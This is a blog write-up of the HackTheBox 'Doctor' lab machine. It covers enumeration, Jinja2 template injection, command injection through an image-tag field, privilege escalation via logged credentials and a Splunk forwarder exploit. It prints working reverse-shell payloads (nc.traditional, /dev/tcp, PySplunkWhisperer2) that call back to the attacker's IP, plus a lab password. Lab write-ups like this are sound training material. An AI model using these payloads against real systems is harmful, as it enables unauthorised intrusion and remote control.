December 8, 2020

Doctor – HackTheBox Writeup

Thoviti Siddharth Infosec CSRF, HackTheBox, HTB, htb-doctor, Infosec, LinPeas, Linux Box, PySplunkWhisper2, Splunk, SSTI, Writeup 0

IP: 10.10.10.209
Difficulty: Easy

Summary: Doctor is a Linux Box that can be exploited using Server Site Template Injection (SSTI) or Cross Site Request Forgery (CSRF). The escalated Splunk service is exploited to escalate privileges to root by using Splunk 8.0.5 exploit.

Information Gathering

Performing a NMAP scan to enumerate ports and services running on the target, we use the following command:

nmap -sC -sV -oN doctor.nmap 10.10.10.209

Port 22, 80 and 8089 are open. It can be observed that port 8089 is running Splunk’s service and that the OS is Linux.
Enumeration

Browsing “10.10.10.209” page, we can find the email address and it’s domain.

Let’s add that to the hosts’ file.

vi /etc/hosts
10.10.10.209    doctors.htb

Visiting the doctors.htb page redirects us to a “Doctor’s Secure Messaging” login page.

Before testing for SQLi, let’s register and login to check the features of this platform.

After logging in, we can create a new message by clicking on “New Message” link on the Navbar.

The content is shown on the page after it is posted. Since it is being reflected.

Let’s check the source!

The source reveals that a so called “archive” page is under testing.
When the “/archive” page is visited, we see a blank page. Let’s check the source again!

We find that the title is being stored in the XML document as title object nested under item.Since the title we input is written to the document, let’s check if the input is being embedded insecurely (Server Site Template Injection).

Server Site Template Injection (SSTI)

These attacks are successful against systems that embed user inputs (dynamic data) in a fixed template (like XML) without proper sanitization or sandboxing.

We can test for SSTI with an arithmetic operation.

{{7*'7'}}

Let’s use this payload in the title of a new message and check if the result of payload, 49 is reflected in the XML.

The source of archive reflects the result 49 in the XML object.
The template engine running on the server can be confirmed by running the following command.

{{7*'7'}}

The result is 49 again. It is confirmed that the web application is using either Twig or Jinja2 template engine.

Cross Site Request Forgery (CSRF)

To test for CSRF, a link with the address of my python webserver was posted.

We receive a GET request from the server on the python server.

Exploitation with CSRF

Let’s deliver the CSRF exploit. This is similar to delivering an XSS payload. We do not need any external host here so I just used my lhost as dummy.

<img src="http://10.10.15.206/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.15.206'$IFS'1337')>

The above payload uses “nc.traditional” as simply issuing “nc” didn’t work. It also uses Internal Field Separator (IFS), a special shell variable used to separate characters. The default value of this variable is space. This was done since using normal spaces didn’t work.

We get a shell!

Exploitation with SSTI

After some googling, the simplest payload I could find to get a shell is:

{{request.application.globals.builtins.import('os').popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.y.z.w/port 0>&1"').read()}}

Listen on netcat.

nc -lvnp 1234

Launch our payload in the title and visit the archive page.

{{request.application.globals.builtins.import('os').popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.15.206/1234 0>&1"').read()}}

We get a shell!
To get an interactive shell, the following commands are run:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
web@doctor:~$ export TERM=screen

We are user ‘web’, but we need to be user ‘Shaun’ to read the flag.

Getting User

Let’s import Linpeas.sh

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

web@doctor:~$ wget http://10.10.15.206:8000/linpeas.sh
web@doctor:~$ bash linpeas.sh

Shaun’s password was found in the webserver’s logs!

Let’s check if this password can be used to login as Shaun.

web@doctor:~$ su shaun
Password: Guitar123

shaun@doctor:~$ cat user.txt

We were able to login and read the flag.

Pwned user!

Privilege Escalation

From the initial nmap scan, we can try enumerating splunk. When the linpeas.sh script was run, it was observed that the service was running as root.Visiting “https://10.10.15.206:8089/” we see some links.

When login is prompted, the credentials of Shaun worked.
There was nothing useful that was found. The header shows that it is Splunk 8.0.5.

A google seach for “Splunk 8.0.5 exploit” led me to “Abusing Splink Forwarders For RCE and Persistence“.

The article says that “Splunk Universal Forwarder Agent (UF) allows authenticated users to send commands or scripts to the agents through Splunk API”.

To exploit this vulnerability, PySplunkWhisper2 was used in the article. Let’s use the same.

git clone https://github.com/cnotin/SplunkWhisperer2
cd SplunkWhisperer2
pip install -r requirements.txt
cd PySplunkWhisperer2

nc -lvnp 1222

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.15.206 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/sh '10.10.15.206' '1222''